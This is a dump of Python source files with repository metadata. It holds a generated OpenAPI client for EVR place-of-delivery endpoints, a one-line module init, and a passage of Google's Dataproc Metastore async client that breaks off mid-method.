] | 3 | 2020-04-18T19:45:51.000Z | 2022-03-01T19:48:11.000Z | pyevr/openapi_client/api/place_of_deliveries_api.py | thorgate/pyevr | 168f2e9459020212213ed0291882a285ebb53839 | [
"MIT"
] | 39 | 2019-11-16T01:35:35.000Z | 2021-11-18T12:58:41.000Z | pyevr/openapi_client/api/place_of_deliveries_api.py | thorgate/pyevr | 168f2e9459020212213ed0291882a285ebb53839 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
EVR API
    EVR API description adapted for OpenAPI Generator. Use this when a client cannot be generated from the specification-compliant EVR API description.  # noqa: E501
The version of the OpenAPI document: 1.8.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from pyevr.openapi_client.api_client import ApiClient
from pyevr.openapi_client.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class PlaceOfDeliveriesApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def place_of_deliveries_add_or_update(self, code, put_place_of_delivery_request, **kwargs): # noqa: E501
        """Add or update a place of delivery  # noqa: E501

        Adds a new place of delivery. If a place of delivery with the given code already exists, the existing one is updated. On creation, the requester is recorded as the owner of the place of delivery.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_add_or_update(code, put_place_of_delivery_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
        :param str code: Code (required)
:param PutPlaceOfDeliveryRequest put_place_of_delivery_request: (required)
        :param str evr_language: Defines the language of returned error messages (supported values are \"et\" for Estonian and \"en\" for English).
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.place_of_deliveries_add_or_update_with_http_info(code, put_place_of_delivery_request, **kwargs) # noqa: E501
def place_of_deliveries_add_or_update_with_http_info(self, code, put_place_of_delivery_request, **kwargs): # noqa: E501
        """Add or update a place of delivery  # noqa: E501

        Adds a new place of delivery. If a place of delivery with the given code already exists, the existing one is updated. On creation, the requester is recorded as the owner of the place of delivery.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_add_or_update_with_http_info(code, put_place_of_delivery_request, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
        :param str code: Code (required)
:param PutPlaceOfDeliveryRequest put_place_of_delivery_request: (required)
        :param str evr_language: Defines the language of returned error messages (supported values are \"et\" for Estonian and \"en\" for English).
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'code',
'put_place_of_delivery_request',
'evr_language'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method place_of_deliveries_add_or_update" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'code' is set
if self.api_client.client_side_validation and ('code' not in local_var_params or # noqa: E501
local_var_params['code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `code` when calling `place_of_deliveries_add_or_update`") # noqa: E501
# verify the required parameter 'put_place_of_delivery_request' is set
if self.api_client.client_side_validation and ('put_place_of_delivery_request' not in local_var_params or # noqa: E501
local_var_params['put_place_of_delivery_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `put_place_of_delivery_request` when calling `place_of_deliveries_add_or_update`") # noqa: E501
collection_formats = {}
path_params = {}
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
if 'evr_language' in local_var_params:
header_params['EVR-LANGUAGE'] = local_var_params['evr_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'put_place_of_delivery_request' in local_var_params:
body_params = local_var_params['put_place_of_delivery_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['SecretApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/placeofdeliveries/{code}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def place_of_deliveries_get(self, code, **kwargs): # noqa: E501
        """Get a place of delivery  # noqa: E501

        Returns the place of delivery matching the code. Only a place of delivery belonging to your own organization can be queried.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_get(code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
        :param str code: Code of the place of delivery to query (case-sensitive) (required)
        :param str evr_language: Defines the language of returned error messages (supported values are \"et\" for Estonian and \"en\" for English).
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PlaceOfDelivery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.place_of_deliveries_get_with_http_info(code, **kwargs) # noqa: E501
def place_of_deliveries_get_with_http_info(self, code, **kwargs): # noqa: E501
        """Get a place of delivery  # noqa: E501

        Returns the place of delivery matching the code. Only a place of delivery belonging to your own organization can be queried.  # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_get_with_http_info(code, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
        :param str code: Code of the place of delivery to query (case-sensitive) (required)
        :param str evr_language: Defines the language of returned error messages (supported values are \"et\" for Estonian and \"en\" for English).
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PlaceOfDelivery, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'code',
'evr_language'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method place_of_deliveries_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'code' is set
if self.api_client.client_side_validation and ('code' not in local_var_params or # noqa: E501
local_var_params['code'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `code` when calling `place_of_deliveries_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'code' in local_var_params:
path_params['code'] = local_var_params['code'] # noqa: E501
query_params = []
header_params = {}
if 'evr_language' in local_var_params:
header_params['EVR-LANGUAGE'] = local_var_params['evr_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['SecretApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/placeofdeliveries/{code}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PlaceOfDelivery', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
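Each generated `*_with_http_info` method first validates the caller's keyword arguments against an allow-list before building the request. A minimal standalone sketch of that check (the function name and the plain `TypeError` are illustrative; the generated client raises its own `ApiTypeError`):

```python
def validate_kwargs(kwargs, allowed, method_name):
    """Reject keyword arguments not in the allow-list, mirroring the
    generated client's unexpected-keyword check."""
    for key in kwargs:
        if key not in allowed:
            raise TypeError(
                "Got an unexpected keyword argument '%s' to method %s"
                % (key, method_name)
            )
    return dict(kwargs)

# Per-method parameters are extended with the transport-level options
# that every generated call accepts.
ALLOWED = ['code', 'evr_language'] + [
    'async_req', '_return_http_data_only', '_preload_content',
    '_request_timeout',
]
```

The same allow-list pattern repeats in every generated method; only the per-method parameter names change.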
def place_of_deliveries_list(self, **kwargs): # noqa: E501
"""Tarnekohtade pärimine # noqa: E501
Tagastab filtritele vastavad aktiivsed avalikud tarnekohad ja kõik ettevõttega seotud tarnekohad. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_list(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name_contains: Filters places of delivery whose name contains the search term
:param str code_starts_with: Filters places of delivery whose code starts with the search term (case-sensitive)
:param str register_code: Filters the company's places of delivery whose register code matches the search term
:param str address: Free-text address search. The following syntax is supported: * text without quotation marks: a logical AND is applied between the words * text in quotation marks: the quoted phrase is searched for * OR: logical OR operator between words * -: logical NOT
:param int page: The page to return
:param str evr_language: Defines the language of returned error messages (supported values are \"et\" for Estonian and \"en\" for English).
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: PagedResultOfPlaceOfDelivery
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.place_of_deliveries_list_with_http_info(**kwargs) # noqa: E501
def place_of_deliveries_list_with_http_info(self, **kwargs): # noqa: E501
"""Tarnekohtade pärimine # noqa: E501
Tagastab filtritele vastavad aktiivsed avalikud tarnekohad ja kõik ettevõttega seotud tarnekohad. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.place_of_deliveries_list_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name_contains: Filters places of delivery whose name contains the search term
:param str code_starts_with: Filters places of delivery whose code starts with the search term (case-sensitive)
:param str register_code: Filters the company's places of delivery whose register code matches the search term
:param str address: Free-text address search. The following syntax is supported: * text without quotation marks: a logical AND is applied between the words * text in quotation marks: the quoted phrase is searched for * OR: logical OR operator between words * -: logical NOT
:param int page: The page to return
:param str evr_language: Defines the language of returned error messages (supported values are \"et\" for Estonian and \"en\" for English).
:param _return_http_data_only: return the response data only, without
the HTTP status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(PagedResultOfPlaceOfDelivery, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name_contains',
'code_starts_with',
'register_code',
'address',
'page',
'evr_language'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method place_of_deliveries_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] > 2147483647: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `place_of_deliveries_list`, must be a value less than or equal to `2147483647`") # noqa: E501
if self.api_client.client_side_validation and 'page' in local_var_params and local_var_params['page'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page` when calling `place_of_deliveries_list`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'name_contains' in local_var_params and local_var_params['name_contains'] is not None: # noqa: E501
query_params.append(('name_contains', local_var_params['name_contains'])) # noqa: E501
if 'code_starts_with' in local_var_params and local_var_params['code_starts_with'] is not None: # noqa: E501
query_params.append(('code_starts_with', local_var_params['code_starts_with'])) # noqa: E501
if 'register_code' in local_var_params and local_var_params['register_code'] is not None: # noqa: E501
query_params.append(('register_code', local_var_params['register_code'])) # noqa: E501
if 'address' in local_var_params and local_var_params['address'] is not None: # noqa: E501
query_params.append(('address', local_var_params['address'])) # noqa: E501
if 'page' in local_var_params and local_var_params['page'] is not None: # noqa: E501
query_params.append(('page', local_var_params['page'])) # noqa: E501
header_params = {}
if 'evr_language' in local_var_params:
header_params['EVR-LANGUAGE'] = local_var_params['evr_language'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['SecretApiKey'] # noqa: E501
return self.api_client.call_api(
'/api/placeofdeliveries', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='PagedResultOfPlaceOfDelivery', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
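The client-side `page` checks in `place_of_deliveries_list_with_http_info` enforce that the page number is a positive signed 32-bit integer (1 ≤ page ≤ 2147483647). A standalone sketch of that validation (hypothetical helper, not part of the generated client):

```python
INT32_MAX = 2_147_483_647  # upper bound the generated validator enforces

def validate_page(page):
    """Client-side range check for the `page` query parameter,
    mirroring the generated checks in place_of_deliveries_list."""
    if page is None:
        return  # parameter omitted; the server default applies
    if page > INT32_MAX:
        raise ValueError("`page` must be <= %d" % INT32_MAX)
    if page < 1:
        raise ValueError("`page` must be >= 1")
```

Running this check locally fails fast with a clear message instead of a round-trip and an HTTP 400 from the server.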
# modules/random_spam/__init__.py (repo: plusterm/plusterm, MIT license)
from .random_spam import *
# google/cloud/metastore_v1/services/dataproc_metastore/async_client.py
# (repo: LaudateCorpus1/python-dataproc-metastore, Apache-2.0 license)
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.api_core import operation # type: ignore
from google.api_core import operation_async # type: ignore
from google.cloud.metastore_v1.services.dataproc_metastore import pagers
from google.cloud.metastore_v1.types import metastore
from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from .transports.base import DataprocMetastoreTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import DataprocMetastoreGrpcAsyncIOTransport
from .client import DataprocMetastoreClient
class DataprocMetastoreAsyncClient:
"""Configures and manages metastore services. Metastore services are
fully managed, highly available, autoscaled, autohealing, OSS-native
deployments of technical metadata management software. Each
metastore service exposes a network endpoint through which metadata
queries are served. Metadata queries can originate from a variety of
sources, including Apache Hive, Apache Presto, and Apache Spark.
The Dataproc Metastore API defines the following resource model:
- The service works with a collection of Google Cloud projects,
named: ``/projects/*``
- Each project has a collection of available locations, named:
``/locations/*`` (a location must refer to a Google Cloud
``region``)
- Each location has a collection of services, named:
``/services/*``
- Dataproc Metastore services are resources with names of the form:
``/projects/{project_number}/locations/{location_id}/services/{service_id}``.
"""
_client: DataprocMetastoreClient
DEFAULT_ENDPOINT = DataprocMetastoreClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = DataprocMetastoreClient.DEFAULT_MTLS_ENDPOINT
backup_path = staticmethod(DataprocMetastoreClient.backup_path)
parse_backup_path = staticmethod(DataprocMetastoreClient.parse_backup_path)
metadata_import_path = staticmethod(DataprocMetastoreClient.metadata_import_path)
parse_metadata_import_path = staticmethod(
DataprocMetastoreClient.parse_metadata_import_path
)
network_path = staticmethod(DataprocMetastoreClient.network_path)
parse_network_path = staticmethod(DataprocMetastoreClient.parse_network_path)
service_path = staticmethod(DataprocMetastoreClient.service_path)
parse_service_path = staticmethod(DataprocMetastoreClient.parse_service_path)
common_billing_account_path = staticmethod(
DataprocMetastoreClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
DataprocMetastoreClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(DataprocMetastoreClient.common_folder_path)
parse_common_folder_path = staticmethod(
DataprocMetastoreClient.parse_common_folder_path
)
common_organization_path = staticmethod(
DataprocMetastoreClient.common_organization_path
)
parse_common_organization_path = staticmethod(
DataprocMetastoreClient.parse_common_organization_path
)
common_project_path = staticmethod(DataprocMetastoreClient.common_project_path)
parse_common_project_path = staticmethod(
DataprocMetastoreClient.parse_common_project_path
)
common_location_path = staticmethod(DataprocMetastoreClient.common_location_path)
parse_common_location_path = staticmethod(
DataprocMetastoreClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataprocMetastoreAsyncClient: The constructed client.
"""
return DataprocMetastoreClient.from_service_account_info.__func__(DataprocMetastoreAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
DataprocMetastoreAsyncClient: The constructed client.
"""
return DataprocMetastoreClient.from_service_account_file.__func__(DataprocMetastoreAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` is provided, use the provided one.
(2) if `GOOGLE_API_USE_MTLS_ENDPOINT` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return DataprocMetastoreClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
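The endpoint-selection order described in the docstring above can be expressed as a small pure function. This is an illustration of the documented rules only, not the library's actual implementation (all names are hypothetical):

```python
def choose_endpoint(api_endpoint, use_mtls_env, have_cert_source,
                    default_endpoint, mtls_endpoint):
    """Pick the API endpoint following the documented precedence."""
    if api_endpoint is not None:      # (1) explicit override always wins
        return api_endpoint
    if use_mtls_env == "always":      # (2) env var forces the mTLS endpoint
        return mtls_endpoint
    if use_mtls_env == "never":       #     ...or forces the regular endpoint
        return default_endpoint
    # "auto": use mTLS only when a client certificate source is available
    return mtls_endpoint if have_cert_source else default_endpoint
```

The real helper additionally resolves the client cert source itself; this sketch takes its availability as a boolean input.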
@property
def transport(self) -> DataprocMetastoreTransport:
"""Returns the transport used by the client instance.
Returns:
DataprocMetastoreTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(DataprocMetastoreClient).get_transport_class, type(DataprocMetastoreClient)
)
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, DataprocMetastoreTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the dataproc metastore client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.DataprocMetastoreTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = DataprocMetastoreClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def list_services(
self,
request: Union[metastore.ListServicesRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListServicesAsyncPager:
r"""Lists services in a project and location.
Args:
request (Union[google.cloud.metastore_v1.types.ListServicesRequest, dict]):
The request object. Request message for
[DataprocMetastore.ListServices][google.cloud.metastore.v1.DataprocMetastore.ListServices].
parent (:class:`str`):
Required. The relative resource name of the location of
metastore services to list, in the following form:
``projects/{project_number}/locations/{location_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1.services.dataproc_metastore.pagers.ListServicesAsyncPager:
Response message for
[DataprocMetastore.ListServices][google.cloud.metastore.v1.DataprocMetastore.ListServices].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.ListServicesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_services,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListServicesAsyncPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
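`ListServicesAsyncPager` lets callers `async for` over individual results while additional pages are fetched lazily behind the scenes. A toy pager (hypothetical class; in-memory lists stand in for RPC responses) shows the `__aiter__` convenience:

```python
import asyncio

class MiniAsyncPager:
    """Minimal illustration of the async-pager shape: iterating the
    pager yields items across page boundaries transparently."""
    def __init__(self, pages):
        self._pages = pages  # lists standing in for per-page RPC responses

    async def __aiter__(self):
        for page in self._pages:
            # a real pager would await the next ListServices RPC here
            for item in page:
                yield item

async def collect(pager):
    return [item async for item in pager]

services = asyncio.run(collect(MiniAsyncPager([["svc-a", "svc-b"], ["svc-c"]])))
```

The page boundary is invisible to the caller, which is the point of the pager wrapper around the raw paged response.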
async def get_service(
self,
request: Union[metastore.GetServiceRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.Service:
r"""Gets the details of a single service.
Args:
request (Union[google.cloud.metastore_v1.types.GetServiceRequest, dict]):
The request object. Request message for
[DataprocMetastore.GetService][google.cloud.metastore.v1.DataprocMetastore.GetService].
name (:class:`str`):
Required. The relative resource name of the metastore
service to retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1.types.Service:
A managed metastore service that
serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.GetServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_service,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
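Every RPC wrapper above enforces the same mutual-exclusion rule between the `request` object and the flattened field arguments. A dict-based sketch of that rule (hypothetical helper, not generated code):

```python
def build_request(request=None, *, name=None):
    """Accept either a full request object or individual fields,
    never both, mirroring the generated has_flattened_params guard."""
    if request is not None and any([name]):
        raise ValueError(
            "If the `request` argument is set, then none of "
            "the individual field arguments should be set."
        )
    request = dict(request or {})
    if name is not None:
        request["name"] = name
    return request
```

Keeping the two call styles exclusive avoids silently merging conflicting values from the request object and the flattened arguments.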
async def create_service(
self,
request: Union[metastore.CreateServiceRequest, dict] = None,
*,
parent: str = None,
service: metastore.Service = None,
service_id: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a metastore service in a project and
location.
Args:
request (Union[google.cloud.metastore_v1.types.CreateServiceRequest, dict]):
The request object. Request message for
[DataprocMetastore.CreateService][google.cloud.metastore.v1.DataprocMetastore.CreateService].
parent (:class:`str`):
Required. The relative resource name of the location in
which to create a metastore service, in the following
form:
``projects/{project_number}/locations/{location_id}``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
service (:class:`google.cloud.metastore_v1.types.Service`):
Required. The Metastore service to create. The ``name``
field is ignored. The ID of the created metastore
service must be provided in the request's ``service_id``
field.
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
service_id (:class:`str`):
Required. The ID of the metastore
service, which is used as the final
component of the metastore service's
name.
This value must be between 2 and 63
characters long inclusive, begin with a
letter, end with a letter or number, and
consist of alpha-numeric ASCII
characters or hyphens.
This corresponds to the ``service_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1.types.Service` A
managed metastore service that serves metadata queries.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, service, service_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = metastore.CreateServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
